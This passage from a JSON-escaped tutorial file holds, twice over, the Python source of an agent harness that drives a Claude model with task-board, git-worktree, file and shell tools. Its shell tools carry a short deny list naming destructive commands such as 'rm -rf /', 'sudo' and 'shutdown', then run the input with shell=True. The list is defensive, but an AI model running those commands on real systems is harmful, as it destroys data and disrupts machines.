cwd=self.repo_root,\n capture_output=True,\n text=True,\n timeout=120,\n )\n if r.returncode != 0:\n msg = (r.stdout + r.stderr).strip()\n raise RuntimeError(msg or f\"git {' '.join(args)} failed\")\n return (r.stdout + r.stderr).strip() or \"(no output)\"\n\n def _load_index(self) -> dict:\n return json.loads(self.index_path.read_text())\n\n def _save_index(self, data: dict):\n self.index_path.write_text(json.dumps(data, indent=2))\n\n def _find(self, name: str) -> dict | None:\n idx = self._load_index()\n for wt in idx.get(\"worktrees\", []):\n if wt.get(\"name\") == name:\n return wt\n return None\n\n def _validate_name(self, name: str):\n if not re.fullmatch(r\"[A-Za-z0-9._-]{1,40}\", name or \"\"):\n raise ValueError(\n \"Invalid worktree name. Use 1-40 chars: letters, numbers, ., _, -\"\n )\n\n def create(self, name: str, task_id: int = None, base_ref: str = \"HEAD\") -> str:\n self._validate_name(name)\n if self._find(name):\n raise ValueError(f\"Worktree '{name}' already exists in index\")\n if task_id is not None and not self.tasks.exists(task_id):\n raise ValueError(f\"Task {task_id} not found\")\n\n path = self.dir / name\n branch = f\"wt/{name}\"\n self.events.emit(\n \"worktree.create.before\",\n task={\"id\": task_id} if task_id is not None else {},\n worktree={\"name\": name, \"base_ref\": base_ref},\n )\n try:\n self._run_git([\"worktree\", \"add\", \"-b\", branch, str(path), base_ref])\n\n entry = {\n \"name\": name,\n \"path\": str(path),\n \"branch\": branch,\n \"task_id\": task_id,\n \"status\": \"active\",\n \"created_at\": time.time(),\n }\n\n idx = self._load_index()\n idx[\"worktrees\"].append(entry)\n self._save_index(idx)\n\n if task_id is not None:\n self.tasks.bind_worktree(task_id, name)\n\n self.events.emit(\n \"worktree.create.after\",\n task={\"id\": task_id} if task_id is not None else {},\n worktree={\n \"name\": name,\n \"path\": str(path),\n \"branch\": branch,\n \"status\": \"active\",\n },\n )\n return json.dumps(entry, indent=2)\n except Exception as e:\n self.events.emit(\n \"worktree.create.failed\",\n task={\"id\": task_id} if task_id is not None else {},\n worktree={\"name\": name, \"base_ref\": base_ref},\n error=str(e),\n )\n raise\n\n def list_all(self) -> str:\n idx = self._load_index()\n wts = idx.get(\"worktrees\", [])\n if not wts:\n return \"No worktrees in index.\"\n lines = []\n for wt in wts:\n suffix = f\" task={wt['task_id']}\" if wt.get(\"task_id\") else \"\"\n lines.append(\n f\"[{wt.get('status', 'unknown')}] {wt['name']} -> \"\n f\"{wt['path']} ({wt.get('branch', '-')}){suffix}\"\n )\n return \"\\n\".join(lines)\n\n def status(self, name: str) -> str:\n wt = self._find(name)\n if not wt:\n return f\"Error: Unknown worktree '{name}'\"\n path = Path(wt[\"path\"])\n if not path.exists():\n return f\"Error: Worktree path missing: {path}\"\n r = subprocess.run(\n [\"git\", \"status\", \"--short\", \"--branch\"],\n cwd=path,\n capture_output=True,\n text=True,\n timeout=60,\n )\n text = (r.stdout + r.stderr).strip()\n return text or \"Clean worktree\"\n\n def run(self, name: str, command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n\n wt = self._find(name)\n if not wt:\n return f\"Error: Unknown worktree '{name}'\"\n path = Path(wt[\"path\"])\n if not path.exists():\n return f\"Error: Worktree path missing: {path}\"\n\n try:\n r = subprocess.run(\n command,\n shell=True,\n cwd=path,\n capture_output=True,\n text=True,\n timeout=300,\n )\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (300s)\"\n\n def remove(self, name: str, force: bool = False, complete_task: bool = False) -> str:\n wt = self._find(name)\n if not wt:\n return f\"Error: Unknown worktree '{name}'\"\n\n self.events.emit(\n \"worktree.remove.before\",\n task={\"id\": wt.get(\"task_id\")} if wt.get(\"task_id\") is not None else {},\n worktree={\"name\": name, \"path\": wt.get(\"path\")},\n )\n try:\n args = [\"worktree\", \"remove\"]\n if force:\n args.append(\"--force\")\n args.append(wt[\"path\"])\n self._run_git(args)\n\n if complete_task and wt.get(\"task_id\") is not None:\n task_id = wt[\"task_id\"]\n before = json.loads(self.tasks.get(task_id))\n self.tasks.update(task_id, status=\"completed\")\n self.tasks.unbind_worktree(task_id)\n self.events.emit(\n \"task.completed\",\n task={\n \"id\": task_id,\n \"subject\": before.get(\"subject\", \"\"),\n \"status\": \"completed\",\n },\n worktree={\"name\": name},\n )\n\n idx = self._load_index()\n for item in idx.get(\"worktrees\", []):\n if item.get(\"name\") == name:\n item[\"status\"] = \"removed\"\n item[\"removed_at\"] = time.time()\n self._save_index(idx)\n\n self.events.emit(\n \"worktree.remove.after\",\n task={\"id\": wt.get(\"task_id\")} if wt.get(\"task_id\") is not None else {},\n worktree={\"name\": name, \"path\": wt.get(\"path\"), \"status\": \"removed\"},\n )\n return f\"Removed worktree '{name}'\"\n except Exception as e:\n self.events.emit(\n \"worktree.remove.failed\",\n task={\"id\": wt.get(\"task_id\")} if wt.get(\"task_id\") is not None else {},\n worktree={\"name\": name, \"path\": wt.get(\"path\")},\n error=str(e),\n )\n raise\n\n def keep(self, name: str) -> str:\n wt = self._find(name)\n if not wt:\n return f\"Error: Unknown worktree '{name}'\"\n\n idx = self._load_index()\n kept = None\n for item in idx.get(\"worktrees\", []):\n if item.get(\"name\") == name:\n item[\"status\"] = \"kept\"\n item[\"kept_at\"] = time.time()\n kept = item\n self._save_index(idx)\n\n self.events.emit(\n \"worktree.keep\",\n task={\"id\": wt.get(\"task_id\")} if wt.get(\"task_id\") is not None else {},\n worktree={\n \"name\": name,\n \"path\": wt.get(\"path\"),\n \"status\": \"kept\",\n },\n )\n return json.dumps(kept, indent=2) if kept else f\"Error: Unknown worktree '{name}'\"\n\n\nWORKTREES = WorktreeManager(REPO_ROOT, TASKS, EVENTS)\n\n\n# -- Base tools (kept minimal, same style as previous sessions) --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(\n command,\n shell=True,\n cwd=WORKDIR,\n capture_output=True,\n text=True,\n timeout=120,\n )\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"task_create\": lambda **kw: TASKS.create(kw[\"subject\"], kw.get(\"description\", \"\")),\n \"task_list\": lambda **kw: TASKS.list_all(),\n \"task_get\": lambda **kw: TASKS.get(kw[\"task_id\"]),\n \"task_update\": lambda **kw: TASKS.update(kw[\"task_id\"], kw.get(\"status\"), kw.get(\"owner\")),\n \"task_bind_worktree\": lambda **kw: TASKS.bind_worktree(kw[\"task_id\"], kw[\"worktree\"], kw.get(\"owner\", \"\")),\n \"worktree_create\": lambda **kw: WORKTREES.create(kw[\"name\"], kw.get(\"task_id\"), kw.get(\"base_ref\", \"HEAD\")),\n \"worktree_list\": lambda **kw: WORKTREES.list_all(),\n \"worktree_status\": lambda **kw: WORKTREES.status(kw[\"name\"]),\n \"worktree_run\": lambda **kw: WORKTREES.run(kw[\"name\"], kw[\"command\"]),\n \"worktree_keep\": lambda **kw: WORKTREES.keep(kw[\"name\"]),\n \"worktree_remove\": lambda **kw: WORKTREES.remove(kw[\"name\"], kw.get(\"force\", False), kw.get(\"complete_task\", False)),\n \"worktree_events\": lambda **kw: EVENTS.list_recent(kw.get(\"limit\", 20)),\n}\n\nTOOLS = [\n {\n \"name\": \"bash\",\n \"description\": \"Run a shell command in the current workspace (blocking).\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"command\": {\"type\": \"string\"}},\n \"required\": [\"command\"],\n },\n },\n {\n \"name\": \"read_file\",\n \"description\": \"Read file contents.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"path\": {\"type\": \"string\"},\n \"limit\": {\"type\": \"integer\"},\n },\n \"required\": [\"path\"],\n },\n },\n {\n \"name\": \"write_file\",\n \"description\": \"Write content to file.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"path\": {\"type\": \"string\"},\n \"content\": {\"type\": \"string\"},\n },\n \"required\": [\"path\", \"content\"],\n },\n },\n {\n \"name\": \"edit_file\",\n \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"path\": {\"type\": \"string\"},\n \"old_text\": {\"type\": \"string\"},\n \"new_text\": {\"type\": \"string\"},\n },\n \"required\": [\"path\", \"old_text\", \"new_text\"],\n },\n },\n {\n \"name\": \"task_create\",\n \"description\": \"Create a new task on the shared task board.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"subject\": {\"type\": \"string\"},\n \"description\": {\"type\": \"string\"},\n },\n \"required\": [\"subject\"],\n },\n },\n {\n \"name\": \"task_list\",\n \"description\": \"List all tasks with status, owner, and worktree binding.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}},\n },\n {\n \"name\": \"task_get\",\n \"description\": \"Get task details by ID.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"task_id\": {\"type\": \"integer\"}},\n \"required\": [\"task_id\"],\n },\n },\n {\n \"name\": \"task_update\",\n \"description\": \"Update task status or owner.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"task_id\": {\"type\": \"integer\"},\n \"status\": {\n \"type\": \"string\",\n \"enum\": [\"pending\", \"in_progress\", \"completed\"],\n },\n \"owner\": {\"type\": \"string\"},\n },\n \"required\": [\"task_id\"],\n },\n },\n {\n \"name\": \"task_bind_worktree\",\n \"description\": \"Bind a task to a worktree name.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"task_id\": {\"type\": \"integer\"},\n \"worktree\": {\"type\": \"string\"},\n \"owner\": {\"type\": \"string\"},\n },\n \"required\": [\"task_id\", \"worktree\"],\n },\n },\n {\n \"name\": \"worktree_create\",\n \"description\": \"Create a git worktree and optionally bind it to a task.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\"type\": \"string\"},\n \"task_id\": {\"type\": \"integer\"},\n \"base_ref\": {\"type\": \"string\"},\n },\n \"required\": [\"name\"],\n },\n },\n {\n \"name\": \"worktree_list\",\n \"description\": \"List worktrees tracked in .worktrees/index.json.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}},\n },\n {\n \"name\": \"worktree_status\",\n \"description\": \"Show git status for one worktree.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"name\": {\"type\": \"string\"}},\n \"required\": [\"name\"],\n },\n },\n {\n \"name\": \"worktree_run\",\n \"description\": \"Run a shell command in a named worktree directory.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\"type\": \"string\"},\n \"command\": {\"type\": \"string\"},\n },\n \"required\": [\"name\", \"command\"],\n },\n },\n {\n \"name\": \"worktree_remove\",\n \"description\": \"Remove a worktree and optionally mark its bound task completed.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\"type\": \"string\"},\n \"force\": {\"type\": \"boolean\"},\n \"complete_task\": {\"type\": \"boolean\"},\n },\n \"required\": [\"name\"],\n },\n },\n {\n \"name\": \"worktree_keep\",\n \"description\": \"Mark a worktree as kept in lifecycle state without removing it.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"name\": {\"type\": \"string\"}},\n \"required\": [\"name\"],\n },\n },\n {\n \"name\": \"worktree_events\",\n \"description\": \"List recent worktree/task lifecycle events from .worktrees/events.jsonl.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"limit\": {\"type\": \"integer\"}},\n },\n },\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL,\n system=SYSTEM,\n messages=messages,\n tools=TOOLS,\n max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}: {str(output)[:200]}\")\n results.append(\n {\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n }\n )\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n print(f\"Repo root for s12: {REPO_ROOT}\")\n if not WORKTREES.git_available:\n print(\"Note: Not in a git repo. worktree_* tools will return errors.\")\n\n history = []\n while True:\n try:\n query = input(\"\\033[36ms12 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: directory isolation -- parallel execution lanes that never collide.\n\"\"\"\ns12_worktree_task_isolation.py - Worktree + Task Isolation\n\nDirectory-level isolation for parallel task execution.\nTasks are the control plane and worktrees are the execution plane.\n\n .tasks/task_12.json\n {\n \"id\": 12,\n \"subject\": \"Implement auth refactor\",\n \"status\": \"in_progress\",\n \"worktree\": \"auth-refactor\"\n }\n\n .worktrees/index.json\n {\n \"worktrees\": [\n {\n \"name\": \"auth-refactor\",\n \"path\": \".../.worktrees/auth-refactor\",\n \"branch\": \"wt/auth-refactor\",\n \"task_id\": 12,\n \"status\": \"active\"\n }\n ]\n }\n\nKey insight: \"Isolate by directory, coordinate by task ID.\"\n\"\"\"\n\nimport json\nimport os\nimport re\nimport subprocess\nimport time\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\n\ndef detect_repo_root(cwd: Path) -> Path | None:\n \"\"\"Return git repo root if cwd is inside a repo, else None.\"\"\"\n try:\n r = subprocess.run(\n [\"git\", \"rev-parse\", \"--show-toplevel\"],\n cwd=cwd,\n capture_output=True,\n text=True,\n timeout=10,\n )\n if r.returncode != 0:\n return None\n root = Path(r.stdout.strip())\n return root if root.exists() else None\n except Exception:\n return None\n\n\nREPO_ROOT = detect_repo_root(WORKDIR) or WORKDIR\n\nSYSTEM = (\n f\"You are a coding agent at {WORKDIR}. \"\n \"Use task + worktree tools for multi-task work. \"\n \"For parallel or risky changes: create tasks, allocate worktree lanes, \"\n \"run commands in those lanes, then choose keep/remove for closeout. \"\n \"Use worktree_events when you need lifecycle visibility.\"\n)\n\n\n# -- EventBus: append-only lifecycle events for observability --\nclass EventBus:\n def __init__(self, event_log_path: Path):\n self.path = event_log_path\n self.path.parent.mkdir(parents=True, exist_ok=True)\n if not self.path.exists():\n self.path.write_text(\"\")\n\n def emit(\n self,\n event: str,\n task: dict | None = None,\n worktree: dict | None = None,\n error: str | None = None,\n ):\n payload = {\n \"event\": event,\n \"ts\": time.time(),\n \"task\": task or {},\n \"worktree\": worktree or {},\n }\n if error:\n payload[\"error\"] = error\n with self.path.open(\"a\", encoding=\"utf-8\") as f:\n f.write(json.dumps(payload) + \"\\n\")\n\n def list_recent(self, limit: int = 20) -> str:\n n = max(1, min(int(limit or 20), 200))\n lines = self.path.read_text(encoding=\"utf-8\").splitlines()\n recent = lines[-n:]\n items = []\n for line in recent:\n try:\n items.append(json.loads(line))\n except Exception:\n items.append({\"event\": \"parse_error\", \"raw\": line})\n return json.dumps(items, indent=2)\n\n\n# -- TaskManager: persistent task board with optional worktree binding --\nclass TaskManager:\n def __init__(self, tasks_dir: Path):\n self.dir = tasks_dir\n self.dir.mkdir(parents=True, exist_ok=True)\n self._next_id = self._max_id() + 1\n\n def _max_id(self) -> int:\n ids = []\n for f in self.dir.glob(\"task_*.json\"):\n try:\n ids.append(int(f.stem.split(\"_\")[1]))\n except Exception:\n pass\n return max(ids) if ids else 0\n\n def _path(self, task_id: int) -> Path:\n return self.dir / f\"task_{task_id}.json\"\n\n def _load(self, task_id: int) -> dict:\n path = self._path(task_id)\n if not path.exists():\n raise ValueError(f\"Task {task_id} not found\")\n return json.loads(path.read_text())\n\n def _save(self, task: dict):\n self._path(task[\"id\"]).write_text(json.dumps(task, indent=2))\n\n def create(self, subject: str, description: str = \"\") -> str:\n task = {\n \"id\": self._next_id,\n \"subject\": subject,\n \"description\": description,\n \"status\": \"pending\",\n \"owner\": \"\",\n \"worktree\": \"\",\n \"blockedBy\": [],\n \"created_at\": time.time(),\n \"updated_at\": time.time(),\n }\n self._save(task)\n self._next_id += 1\n return json.dumps(task, indent=2)\n\n def get(self, task_id: int) -> str:\n return json.dumps(self._load(task_id), indent=2)\n\n def exists(self, task_id: int) -> bool:\n return self._path(task_id).exists()\n\n def update(self, task_id: int, status: str = None, owner: str = None) -> str:\n task = self._load(task_id)\n if status:\n if status not in (\"pending\", \"in_progress\", \"completed\"):\n raise ValueError(f\"Invalid status: {status}\")\n task[\"status\"] = status\n if owner is not None:\n task[\"owner\"] = owner\n task[\"updated_at\"] = time.time()\n self._save(task)\n return json.dumps(task, indent=2)\n\n def bind_worktree(self, task_id: int, worktree: str, owner: str = \"\") -> str:\n task = self._load(task_id)\n task[\"worktree\"] = worktree\n if owner:\n task[\"owner\"] = owner\n if task[\"status\"] == \"pending\":\n task[\"status\"] = \"in_progress\"\n task[\"updated_at\"] = time.time()\n self._save(task)\n return json.dumps(task, indent=2)\n\n def unbind_worktree(self, task_id: int) -> str:\n task = self._load(task_id)\n task[\"worktree\"] = \"\"\n task[\"updated_at\"] = time.time()\n self._save(task)\n return json.dumps(task, indent=2)\n\n def list_all(self) -> str:\n tasks = []\n for f in sorted(self.dir.glob(\"task_*.json\")):\n tasks.append(json.loads(f.read_text()))\n if not tasks:\n return \"No tasks.\"\n lines = []\n for t in tasks:\n marker = {\n \"pending\": \"[ ]\",\n \"in_progress\": \"[>]\",\n \"completed\": \"[x]\",\n }.get(t[\"status\"], \"[?]\")\n owner = f\" owner={t['owner']}\" if t.get(\"owner\") else \"\"\n wt = f\" wt={t['worktree']}\" if t.get(\"worktree\") else \"\"\n lines.append(f\"{marker} #{t['id']}: {t['subject']}{owner}{wt}\")\n return \"\\n\".join(lines)\n\n\nTASKS = TaskManager(REPO_ROOT / \".tasks\")\nEVENTS = EventBus(REPO_ROOT / \".worktrees\" / \"events.jsonl\")\n\n\n# -- WorktreeManager: create/list/run/remove git worktrees + lifecycle index --\nclass WorktreeManager:\n def __init__(self, repo_root: Path, tasks: TaskManager, events: EventBus):\n self.repo_root = repo_root\n self.tasks = tasks\n self.events = events\n self.dir = repo_root / \".worktrees\"\n self.dir.mkdir(parents=True, exist_ok=True)\n self.index_path = self.dir / \"index.json\"\n if not self.index_path.exists():\n self.index_path.write_text(json.dumps({\"worktrees\": []}, indent=2))\n self.git_available = self._is_git_repo()\n\n def _is_git_repo(self) -> bool:\n try:\n r = subprocess.run(\n [\"git\", \"rev-parse\", \"--is-inside-work-tree\"],\n cwd=self.repo_root,\n capture_output=True,\n text=True,\n timeout=10,\n )\n return r.returncode == 0\n except Exception:\n return False\n\n def _run_git(self, args: list[str]) -> str:\n if not self.git_available:\n raise RuntimeError(\"Not in a git repository. worktree tools require git.\")\n r = subprocess.run(\n [\"git\", *args],\n cwd=self.repo_root,\n capture_output=True,\n text=True,\n timeout=120,\n )\n if r.returncode != 0:\n msg = (r.stdout + r.stderr).strip()\n raise RuntimeError(msg or f\"git {' '.join(args)} failed\")\n return (r.stdout + r.stderr).strip() or \"(no output)\"\n\n def _load_index(self) -> dict:\n return json.loads(self.index_path.read_text())\n\n def _save_index(self, data: dict):\n self.index_path.write_text(json.dumps(data, indent=2))\n\n def _find(self, name: str) -> dict | None:\n idx = self._load_index()\n for wt in idx.get(\"worktrees\", []):\n if wt.get(\"name\") == name:\n return wt\n return None\n\n def _validate_name(self, name: str):\n if not re.fullmatch(r\"[A-Za-z0-9._-]{1,40}\", name or \"\"):\n raise ValueError(\n \"Invalid worktree name. Use 1-40 chars: letters, numbers, ., _, -\"\n )\n\n def create(self, name: str, task_id: int = None, base_ref: str = \"HEAD\") -> str:\n self._validate_name(name)\n if self._find(name):\n raise ValueError(f\"Worktree '{name}' already exists in index\")\n if task_id is not None and not self.tasks.exists(task_id):\n raise ValueError(f\"Task {task_id} not found\")\n\n path = self.dir / name\n branch = f\"wt/{name}\"\n self.events.emit(\n \"worktree.create.before\",\n task={\"id\": task_id} if task_id is not None else {},\n worktree={\"name\": name, \"base_ref\": base_ref},\n )\n try:\n self._run_git([\"worktree\", \"add\", \"-b\", branch, str(path), base_ref])\n\n entry = {\n \"name\": name,\n \"path\": str(path),\n \"branch\": branch,\n \"task_id\": task_id,\n \"status\": \"active\",\n \"created_at\": time.time(),\n }\n\n idx = self._load_index()\n idx[\"worktrees\"].append(entry)\n self._save_index(idx)\n\n if task_id is not None:\n self.tasks.bind_worktree(task_id, name)\n\n self.events.emit(\n \"worktree.create.after\",\n task={\"id\": task_id} if task_id is not None else {},\n worktree={\n \"name\": name,\n \"path\": str(path),\n \"branch\": branch,\n \"status\": \"active\",\n },\n )\n return json.dumps(entry, indent=2)\n except Exception as e:\n self.events.emit(\n \"worktree.create.failed\",\n task={\"id\": task_id} if task_id is not None else {},\n worktree={\"name\": name, \"base_ref\": base_ref},\n error=str(e),\n )\n raise\n\n def list_all(self) -> str:\n idx = self._load_index()\n wts = idx.get(\"worktrees\", [])\n if not wts:\n return \"No worktrees in index.\"\n lines = []\n for wt in wts:\n suffix = f\" task={wt['task_id']}\" if wt.get(\"task_id\") else \"\"\n lines.append(\n f\"[{wt.get('status', 'unknown')}] {wt['name']} -> \"\n f\"{wt['path']} ({wt.get('branch', '-')}){suffix}\"\n )\n return \"\\n\".join(lines)\n\n def status(self, name: str) -> str:\n wt = self._find(name)\n if not wt:\n return f\"Error: Unknown worktree '{name}'\"\n path = Path(wt[\"path\"])\n if not path.exists():\n return f\"Error: Worktree path missing: {path}\"\n r = subprocess.run(\n [\"git\", \"status\", \"--short\", \"--branch\"],\n cwd=path,\n capture_output=True,\n text=True,\n timeout=60,\n )\n text = (r.stdout + r.stderr).strip()\n return text or \"Clean worktree\"\n\n def run(self, name: str, command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n\n wt = self._find(name)\n if not wt:\n return f\"Error: Unknown worktree '{name}'\"\n path = Path(wt[\"path\"])\n if not path.exists():\n return f\"Error: Worktree path missing: {path}\"\n\n try:\n r = subprocess.run(\n command,\n shell=True,\n cwd=path,\n capture_output=True,\n text=True,\n timeout=300,\n )\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (300s)\"\n\n def remove(self, name: str, force: bool = False, complete_task: bool = False) -> str:\n wt = self._find(name)\n if not wt:\n return f\"Error: Unknown worktree '{name}'\"\n\n self.events.emit(\n \"worktree.remove.before\",\n task={\"id\": wt.get(\"task_id\")} if wt.get(\"task_id\") is not None else {},\n worktree={\"name\": name, \"path\": wt.get(\"path\")},\n )\n try:\n args = [\"worktree\", \"remove\"]\n if force:\n args.append(\"--force\")\n args.append(wt[\"path\"])\n self._run_git(args)\n\n if complete_task and wt.get(\"task_id\") is not None:\n task_id = wt[\"task_id\"]\n before = json.loads(self.tasks.get(task_id))\n self.tasks.update(task_id, status=\"completed\")\n self.tasks.unbind_worktree(task_id)\n self.events.emit(\n \"task.completed\",\n task={\n \"id\": task_id,\n \"subject\": before.get(\"subject\", \"\"),\n \"status\": \"completed\",\n },\n worktree={\"name\": name},\n )\n\n idx = self._load_index()\n for item in idx.get(\"worktrees\", []):\n if item.get(\"name\") == name:\n item[\"status\"] = \"removed\"\n item[\"removed_at\"] = time.time()\n self._save_index(idx)\n\n self.events.emit(\n \"worktree.remove.after\",\n task={\"id\": wt.get(\"task_id\")} if wt.get(\"task_id\") is not None else {},\n worktree={\"name\": name, \"path\": wt.get(\"path\"), \"status\": \"removed\"},\n )\n return f\"Removed worktree '{name}'\"\n except Exception as e:\n self.events.emit(\n \"worktree.remove.failed\",\n task={\"id\": wt.get(\"task_id\")} if wt.get(\"task_id\") is not None else {},\n worktree={\"name\": name, \"path\": wt.get(\"path\")},\n error=str(e),\n )\n raise\n\n def keep(self, name: str) -> str:\n wt = self._find(name)\n if not wt:\n return f\"Error: Unknown worktree '{name}'\"\n\n idx = self._load_index()\n kept = None\n for item in idx.get(\"worktrees\", []):\n if item.get(\"name\") == name:\n item[\"status\"] = \"kept\"\n item[\"kept_at\"] = time.time()\n kept = item\n self._save_index(idx)\n\n self.events.emit(\n \"worktree.keep\",\n task={\"id\": wt.get(\"task_id\")} if wt.get(\"task_id\") is not None else {},\n worktree={\n \"name\": name,\n \"path\": wt.get(\"path\"),\n \"status\": \"kept\",\n },\n )\n return json.dumps(kept, indent=2) if kept else f\"Error: Unknown worktree '{name}'\"\n\n\nWORKTREES = WorktreeManager(REPO_ROOT, TASKS, EVENTS)\n\n\n# -- Base tools (kept minimal, same style as previous sessions) --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(\n command,\n shell=True,\n cwd=WORKDIR,\n capture_output=True,\n text=True,\n timeout=120,\n )\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"task_create\": lambda **kw: TASKS.create(kw[\"subject\"], kw.get(\"description\", \"\")),\n \"task_list\": lambda **kw: TASKS.list_all(),\n \"task_get\": lambda **kw: TASKS.get(kw[\"task_id\"]),\n \"task_update\": lambda **kw: TASKS.update(kw[\"task_id\"], kw.get(\"status\"), kw.get(\"owner\")),\n \"task_bind_worktree\": lambda **kw: TASKS.bind_worktree(kw[\"task_id\"], kw[\"worktree\"], kw.get(\"owner\", \"\")),\n \"worktree_create\": lambda **kw: WORKTREES.create(kw[\"name\"], kw.get(\"task_id\"), kw.get(\"base_ref\", \"HEAD\")),\n \"worktree_list\": lambda **kw: WORKTREES.list_all(),\n \"worktree_status\": lambda **kw: WORKTREES.status(kw[\"name\"]),\n \"worktree_run\": lambda **kw: WORKTREES.run(kw[\"name\"], kw[\"command\"]),\n \"worktree_keep\": lambda **kw: 